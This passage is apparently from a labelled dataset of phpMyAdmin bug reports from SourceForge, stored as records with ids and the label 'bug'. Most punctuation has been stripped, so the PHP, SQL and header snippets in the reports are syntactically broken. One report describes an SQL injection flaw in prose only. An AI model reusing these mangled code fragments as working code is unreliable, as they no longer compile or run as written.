I have debugged the code of phpMyAdmin and found out, that the query, which should load the table information, failed phpMyAdmin executes this query SHOW TABLE STATUS FROM `mydatabasename`; Th error is ERROR 1143 42000) SELECT command denied to user 192.168.55. for column method in table sales flat order payment The reason is a privilege problem of some views see MySQL bugtracker http bugs.mysql.com bug.php?id=63527 c394325 ).
But that is not important for phpMyAdmin.
It would be nice if phpMyAdmin could show the error message to the user maybe with the hint that it may be a privilege issue with one of the existing views).
So that the user is able to search for a solution.
Original URL https sourceforge.net p phpmyadmin bugs 3773 Original author lem9 Found in version 3.5.5","bug"
"24444","9968","Altering table logs out user.
Affected branch master Steps to reproduce 1\.
Set cfg[ Servers ][ i][ auth ] = cookie ; 2\.
Switch to a table with a VARCHAR column.
3\.
Open its structure page.
4\.
In the row of the VARCHAR column, click the Change link.
5\.
In the Default dropdown, select As defined .
6\.
Enter any default value.
The entered value must be longer than the VARCHAR length.
7\.
Click Save , dismiss the notification 1067 Invalid default value for colname .
8\.
Close the jQuery UI dialog, and try to access any other page.
Expected result The page would open.
Actual result The login window appears.
fe70a3c7de6af8d4d56d514ac0b903daef89c1c3 is the first bad commit Author Michal xc4x8cihaxc5x99 lt;mcihar suse.cz gt; Date Wed Apr 11 14 04 00 2012 0200 Remove parameter die and use PMA fatalError instead The parameter was used in testsuite only and this case is already handled by PMA fatalError.
Original URL https sourceforge.net p phpmyadmin bugs 3572 Original author mynetx Found in version Latest Git","bug"
"24444","9969","Importing SQL file opens new window.
I just updated to the latest master snapshot, and when I imported an SQL file into a table, the form submission opened in a new window.
Windows 7 64 bit Google Chrome 18 PMA 4.0.0 dev Original URL https sourceforge.net p phpmyadmin bugs 3573 Original author benjamwelker Found in version Latest Git","bug"
"24444","9970","mysqli vs. mysql different DisplayBinaryAsHex behaviour.
In noticed a problem and difference when using mysql as client database interface and not having set a config value for DisplayBinaryAsHex .
Using mysqli does not result in problems.
Problem ======= With the older mysql clients several different versions on several phpMyAdmin installations) I tnoticed that phpMyAdmin shows database entries UTF8 binary) having Umlauts and accented characters as HEX string like 56585736..... instead as text.
Switching to mysqli inconfig.inc.php does not show this behaviour.
I then decided to use mysqli with phpMyAdmin.
Then I learned that three further issues influence the way how pma renders database entries cookies the difficult to find option settings Show binary contents as HEX ) the config.inc.php setting cfg[ DisplayBinaryAsHex ] = true; see http wiki.phpmyadmin.net pma Config DisplayBinaryAsHex I am filing this as bug for the only reason that you please check whether there is a slight difference in phpMyAdmin internal handling for mysqli and mysql clients which might result in the mentioned different behaviour when a user is not aware of the DisplayBinaryAsHex setting and option.
My current problem as such is solved.
Original URL https sourceforge.net p phpmyadmin bugs 3574 Original author wikinaut","bug"
"24444","9971","Suhosin patch warning incorrectly displayed.
When you run PHP with Suhosin extension, the pma page shows the Suhosin warning.
With PMA 3.5.0, the Suhosin warning is not rendered correctly as HTML with a clickable link to the documentation), but sanitized which results in escaped HTML entities instead of HTML.
This was correctly rendered in versions lt; 3.5.0.
Original URL https sourceforge.net p phpmyadmin bugs 3575 Original author wikinaut Found in version 3.5.0","bug"
"24444","9972","version.js causes certificate error.
In functions.js the asynchronous .js request to phpmyadmin.net for a new version needs to be sent over https if the panel is being accessed via https.
if li.jsversioncheck ).length gt; 0) \{ .getScript http www.phpmyadmin.net home page version.js , PMA current version); \} Original URL https sourceforge.net p phpmyadmin bugs 3576 Original author anonymous","bug"
"24444","9973","problem with backslash in enum.
Hello When having \ backslash) in a enum s value, there s a problem to display correctly escaped \ character.
Example Create a table with an enum field with length values Boo\ , Foo\\ , Roo enum Boo\ , Foo\\ , Roo )).
When we try to add a new line, see bug when we try to add a new row, we can see an error in the dropdown list see the following Boo \ , , Roo ).
I find error in file libraries\common.lib.php function PMA extractFieldSpec rows 2966 2979.
My code to repair here ... elseif \ == char isset fieldspec[ index 1]) ) { escaping of a quote?
if == fieldspec[ index 1]) { working .= ; index ; } elseif \ == fieldspec[ index 1]) { working .= \ ; if == fieldspec[ index 2]) { index ; } } } else ... Bug seen on phpMyAdmin 3.5.5 Original URL https sourceforge.net p phpmyadmin bugs 3779 Original author bontos Found in version 3.5.5","bug"
"24444","9974","Server status page Incorrect dialog box titles.
In server status page, a single dialog box is reused in number of occasions.
However its title is not changed properly to reflect its current use.
Original URL https sourceforge.net p phpmyadmin bugs 3577 Original author madhuracj Found in version 3.5.0","bug"
"24444","9975","NOW ) function incorrectly selected.
Disclaimer This bug HAS already been reported https sourceforge.net tracker ?func=detail aid=1334627 group id=23067 atid=377408 ).
However, it appears that SourceForge does not permit one to comment on bugs that have been Closed.
If I am overlooking the ability to post comments to Closed issues, please forgive my ignorance.
The issue is that phpMyAdmin inserts the NOW ) function s return value when inserting or updating a row, even when the NULL box is checked just to the right of the function drop down menu.
Why is the NOW ) function selected by default in the drop down for a column whose default value is defined as NULL?
The function menu should be set to [blank] when the page loads for columns whose default is NULL, and should be set to NOW ) only when a selection is made from the function menu.
PMA has it almost correct; the NULL box is checked within the interface just to the right of the function drop down) when the column s default value is defined as NULL.
So, again, why is NOW ) selected in the function drop down?
There is discussion of this issue at http stackoverflow.com questions 6576604 mysql phpmyadmin timestamp always executes now function .
Some snide hot shot Bohemian) claims that, Unlike other databases, in MySQL TIMESTAMP columns are ALWAYS updated with now ) whenever the row is updated.
This is a deliberate feature of the TIMESTAMP datatype.
Of course, there is no link to any supporting documentation, and further, the observed behavior betrays his statement probably why his answer was voted 2).
This individual failed to understand that the OP had defined the columns in question with the NULL attribute, in order to permit NULL values.
Viktor sets the record straight with the following insightful comment TIMESTAMP columns are not always updated.
Try creating a table with, for instance, a VARCHAR column and a TIMESTAMP column defined as NULL DEFAULT NULL.
Insert a row, specifying only the VARCHAR field.
The TIMESTAMP field will stay as NULL.
Update the inserted row, again specifying only the VARCHAR field.
Again, the TIMESTAMP will stay as NULL.
Just tested with MySQL 5.1.
So, I did the due diligence here and read the actual documentation http dev.mysql.com doc refman 5.0 en timestamp initialization.html .
Jump down to the TIMESTAMP Initialization and the NULL Attribute section for the relevant information.
The first paragraph describes precisely the behavior that I WANT and EXPECT, and the last sentence says it all If a TIMESTAMP column permits NULL values, assigning NULL sets it to NULL, not to the current timestamp.
Further, A TIMESTAMP column that permits NULL values does not take on the current timestamp at insert time except under one of the following conditions 1) Its default value is defined as CURRENT TIMESTAMP and no value is specified for the column; 2) CURRENT TIMESTAMP or any of its synonyms such as NOW ) is explicitly inserted into the column.
Condition 1) is not met I have defined the default value as NULL, not CURRENT TIMESTAMP), which seems to indicate that phpMyAdmin is, in fact, inserting CURRENT TIMESTAMP, NOW ), etc.
into the column when it should not be.
In the event that it s relevant, I roll with AJAX disabled in PMA I find the light boxed Create New Table interface unbearable).
STEPS TO REPRODUCE 1.)
Create a test table.
CREATE TABLE IF NOT EXISTS `shr cms content article` `id` int 9) unsigned NOT NULL AUTO INCREMENT, `name` varchar 255) COLLATE utf8 unicode ci DEFAULT NULL, `status` tinyint 1) unsigned NOT NULL DEFAULT 1 , `body` text COLLATE utf8 unicode ci, `slug` varchar 127) COLLATE utf8 unicode ci DEFAULT NULL, `timePublished` timestamp NULL DEFAULT NULL, `timeDeleted` timestamp NULL DEFAULT NULL, `deleter` int 9) unsigned DEFAULT NULL, PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8 unicode ci AUTO INCREMENT=1 ; 2.)
Insert data as per attached screenshot.
3.)
Examine the resultant SQL INSERT INTO `cdmc`.`shr cms content article` `id` , `name` , `status` , `body` , `slug` , `timePublished` , `timeDeleted` , `deleter` ) VALUES NULL , Test , 1 , Test.
, test , NOW ) , NOW ) , NULL ); Original URL https sourceforge.net p phpmyadmin bugs 3579 Original author cbj4074 Found in version 4.1.5","bug"
"24444","9976","Fatal error Call to undefined function ).
The error messages from the file Coinfig.class.php call a function from the not exists in this file.
At line 727 of file is the following code sprintf Existing configuration file s) is not readable. )
this gt; getSource ) ) The function ) does not exist.
Original URL https sourceforge.net p phpmyadmin bugs 3580 Original author daniduesentrieb Found in version 3.5.0","bug"
"24444","9977","JS error when editing index.
Steps to reproduce the error go to tbl structure.php add an index using the more dropdown you will land on sql.php) try to edit any index you will get the following JS error checkIndexType is not defined The problem here is that indexes.js is missing from sql.php Original URL https sourceforge.net p phpmyadmin bugs 3581 Original author roccivic Found in version 3.5.0","bug"
"24444","9978","Keyhandler is broken.
When creating a table, or editing table structure, it used to be possible to move around in the cells of the html table using CTRL arrow keys implemented in js keyhandler.js).
This functionality seems to be broken in master.
Original URL https sourceforge.net p phpmyadmin bugs 3787 Original author roccivic Found in version Latest Git","bug"
"24444","9979","table field name missing in relation schema pdf export.
In master 4.0 dev), when creating a pdf schema export, the text table and field names) are missing from the relation schema.
It is working fine in QA 3 5 Original URL https sourceforge.net p phpmyadmin bugs 3788 Original author ruleant Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 3788 attachment test.pdf","bug"
"24444","9980","Edit view functionality broken.
When trying to edit a view by clicking the Edit view link in the structure tab nothing is displayed.. Firebug console gives the following error.
iframe[class= IE hack ] ).width after field.width )) is null Original URL https sourceforge.net p phpmyadmin bugs 3582 Original author madhuracj Found in version Latest Git","bug"
"24444","9981","SQL injection ajax live editing.
Under specific circumstances the ajax live editing of rows is broken and SQL injection is possible.
Tescase gt; create a table where a least one attribute has a description gt; insert rows into that table gt; search for one row in that table gt; now use ajax functionality to edit the attribute of that row, that has the description gt; an error occurs, because the following update statement uses the description as part of the column attribute name to update the row Original URL https sourceforge.net p phpmyadmin bugs 3584 Original author schattenfell Found in version 3.5.0","bug"
"24444","9982","Inline edit decodes html entities.
I have a VARCHAR column with a row containing HTML entity codes, e.g.
amp;aacute; amp;ntilde; etc, and these show up correctly without decoding them) when clicking on Browse or Edit .
However clicking on inline edit to edit one of these fields decodes the HTML entities e.g.
xc3xa1 or xc3xb1 respectively using the previous example).
This should not be done as some people would prefer to leave them as the HTML entities to not have to worry about character encoding issues.
Original URL https sourceforge.net p phpmyadmin bugs 3585 Original author mikerobinson Found in version 3.4.0","bug"
"24444","9983","Grid editing does not work all the time.
Seems like the grid editing is sensible for the comment text for a column.
Sometime it works, but in this example it fail CREATE TABLE meter convert id int 10) unsigned not null auto increment, meter id int 12) not null, meter incrementmax int 10) not null, period factor float not null default 1, new factor float not null default 1, start period int 10) unsigned not null default 0, end period int 10) unsigned not null default 0, convert direction tinyint 3) not null default 1 comment 0 incremantal gt; volum, 1 volum gt; incremental , missingvalueaction id tinyint 3) not null default 0, do convert tinyint 3) unsigned not null default 0 comment 0 done, 1 to be done, 2 error , createdtime int 10) unsigned not null default 0, createdby mediumint 8) unsigned not null default 0, finnishtime int 10) unsigned not null default 0, finnish status tinyint 3) unsigned not null default 0, primary key id) ) engine=InnoDb; Trying to change the convert direction value for a row cause an error see attached image file).
Also, it s not possible to remove the error frame without leaving the page by clicking on another link) Original URL https sourceforge.net p phpmyadmin bugs 3586 Original author postit7000 Found in version 3.5.0","bug"
"24444","9984","Changelog at phpmyadmin.net don t work.
The changelog at phpmyadmin.net website at this url give a blank page http www.phpmyadmin.net documentation changelog.php It would be nice if that page work, so that I can link to it from my status updates on twitter and other places ...
Original URL https sourceforge.net p phpmyadmin bugs 3587 Original author aommundsen","bug"
"24444","9985","X WebKit CSP Header breaks Safari 5.1.
In 3.5.1 the line header X WebKit CSP default src \ self\ \ unsafe inline\ ; img src \ self\ data ; script src \ self\ \ unsafe inline\ \ unsafe eval\ http www.phpmyadmin.net ); was added in libraries header http.inc.php.
This prevents Safari from loading frames and scripts.
Original URL https sourceforge.net p phpmyadmin bugs 3588 Original author dotplex Found in version 3.5.8","bug"
"24444","9986","No table permissions displayed.
I discovered an issue since version 3.5.0.
I have some users with granted table privilegs but PMA says Table specific privileges None I have confirmed that the rights are in `mysql`.`tables priv`.
When I try to add the same rights with PMA it says the rights are already defined but no rights shown in the list.
Some system information Database server Server Localhost via UNIX socket Software MySQL Software version 5.5.22 log MySQL Community Server GPL) Protocol version 10 User root localhost Server charset UTF 8 Unicode utf8) Web server nginx Database client version libmysql mysqlnd 5.0.10 20111026 Id b0b3b15c693b7f6aeb3aa66b646fee339f175e39 PHP extension mysqli Original URL https sourceforge.net p phpmyadmin bugs 3589 Original author andre4tw Found in version 3.5.3","bug"
"24444","9987","Firefox bug in SQL tab.
I ve spotted what seems to be an unusual bug in sql.js.
Steps to reproduce Open firefox Open firebug console Go to main.php Click on the SQL tab Enter this query USE somedb Click Go At this point your firebug console should be busy displaying a dozen of requests for JS files which are totally unnecessary and the database that you attempted to select has not been selected for you.
Now, onto the interesting part, git bisect says that the bug comes from commit 44364aae1bf51847744b53dfc773ad0415efba6b.
The commit itself looks quite harmless, but somehow it manages to break this functionality.
In fact, if in current master you replace isAddClass on lines 549 and 562 back to class , the issue disappears.
As far as I can see, this issue is only present in Firefox I m using version 12.0).
I tested Chromium 18.0 and IE 8, however they do not have this issue.
Original URL https sourceforge.net p phpmyadmin bugs 3591 Original author roccivic Found in version Latest Git","bug"
"24444","9988","Table count does not update after DROP.
When viewing the database structure, and after using the red X button to drop a table, the bottom bolded total row above Check All ) Table column does not update with the current number of tables.
All the other columns seem to update properly Rows, Size, Overhead).
Configuration phpMyAdmin 3.4.5 PHP 5.3.10 MySQL 5.5.20 Original URL https sourceforge.net p phpmyadmin bugs 3592 Original author mongo02 Found in version 3.4.5","bug"
"24444","9989","Safari 5.1.5 Issues with version 3.5.1.
I just upgraded to the latest stable version 3.5.1.
Unfortunately, after login, the main page is blank in Safari 5.1.5.
I ve checked in an older Safari 4.1.3) and it had no problems there, so I m not sure what s causing it.
When I went back to the 3.5 stable version, it works perfectly.
Just no in 3.5.1.
I even looked at the source and it seems innocuous enough, but it s not showing.
I cleared my cache, my cookies, everything.
No go.
Original URL https sourceforge.net p phpmyadmin bugs 3593 Original author anonymous","bug"
"24444","9990","GC maxlifetime warning incorrectly displayed.
Using cfg[ LoginCookieValidity ] greater than session.gc maxlifetime the warning is shown.
With PMA 3.5.1, the warning is not rendered correctly as HTML with a clickable link to the documentation), but sanitized which results in escaped HTML entities instead of HTML like Your PHP parameter lt;a href= .
url.php?url=http 3A 2F 2Fphp.net... ), similar to ID 3519747 In dev last from github, rev.
12af3d2) version it s ok.
I m expecting the next version will be correct.
Original URL https sourceforge.net p phpmyadmin bugs 3597 Original author janpecek Found in version 3.5.1","bug"
"24444","9991","GLOBALS[ text dir ] wrong value for Romanian.
If language is Romanian, GLOBALS[ text dir ] is nor ltr nor rtl.
The value of GLOBALS[ text dir ] is something like ssd after executing index.php).
Navigation frame is never displayed and objects displaying order is sometimes ltr and other times rtl very annoying.
I previously used 3.4.x version and the bug appeared in 3.5.1 version.
System Windows XP SP 3 Apache 2.2 PHP 5.3.6 MySQL 5.5.13 Original URL https sourceforge.net p phpmyadmin bugs 3598 Original author braila Found in version 3.5.1","bug"
"24444","9992","Advisor not working on FreeBSD.
Fatal error lt; b gt; Call to a member function memory ) on a non object in var www html phpMyAdmin 3.5.1 all languages libraries Advisor.class.php lt; b gt; on line 37.
Sysinfo is generating an empty array since it s not in the supported array in sysinfo.lib.php.
Since the PHP error isnt exactly valid json it will keep showing the loading icon instead of some kind of error that it s an unsupported os.
PHP version 5.3.13 Mysql 5.5.20 PHPMyAdmin 3.5.1 OS FreeBSD 9.0 x64 Original URL https sourceforge.net p phpmyadmin bugs 3600 Original author anonymous Found in version 3.5.1","bug"
"24444","9993","No form validation in change password dialog.
Client side validation is missing in the change password dialog that is available on main.php Original URL https sourceforge.net p phpmyadmin bugs 3601 Original author roccivic Found in version 3.5.1","bug"
"24444","9994","Broken password validation in copy user form.
To reproduce go to users tab click edit prvileges near a user scroll down to the copy section change the username set password to use text field do not type in a password and press enter you will be prompted about a missing password the form is submitted regardless of the error Original URL https sourceforge.net p phpmyadmin bugs 3602 Original author roccivic Found in version 3.5.1","bug"
"24444","9995","Multiple entries when using insert as new row .
When running 9d38c34 from master branch I get a Firefox has detected that the server is redirecting the request for this address in a way that will never complete.
error.
Re browsing the table shows that 20 new rows have been inserted all identical to the one I was trying to insert, save the primary key.
Original URL https sourceforge.net p phpmyadmin bugs 3605 Original author adrianbj Found in version Latest Git snapshot","bug"
"24444","9996","Can t Drop table.
Can no longer use Delete the table DROP) from the operations tab Just get Processing Request sitting there forever.
This happens with the most very basic of tables.
Empty still works fine.
Original URL https sourceforge.net p phpmyadmin bugs 3606 Original author adrianbj Found in version Latest Git snapshot","bug"
"24444","9997","bookmarks deleted after table drop.
I am having the same issue as described below.
What is the steps for resolution?
https sourceforge.net tracker index.php?func=detail aid=3042706 group id=23067 atid=377408 Original URL https sourceforge.net p phpmyadmin bugs 3607 Original author bandmaster7 Found in version 2.11.9","bug"
"24444","9998","duplicate line in config.sample.inc.php.
This is a very minor bug; I noticed a duplicate line has worked it s way into config.sample.inc.php on both phpMyAdmin 3.5.0 english and phpMyAdmin 3.5.1 english cat phpMyAdmin 3.5.1 english config.sample.inc.php |grep table ui cfg[ Servers ][ i][ table uiprefs ] = pma table uiprefs ; cfg[ Servers ][ i][ table uiprefs ] = pma table uiprefs ; Not a big deal, obviously..thanks to everyone s help in making phpMyAdmin an awesome piece of software.
Christopher Juckins Original URL https sourceforge.net p phpmyadmin bugs 3608 Original author chrisjatlanta Found in version 3.5.0","bug"
"24444","9999","After Rename table ... to ... left menu doesn t reflect changes.
I found a bug when i was trying to rename a table s name.
When I do rename table a table to a new table through sql written syntax, the left side menu doesn t update the updated table s name.
Original URL https sourceforge.net p phpmyadmin bugs 3818 Original author russellhoff Found in version 4.0.0","bug"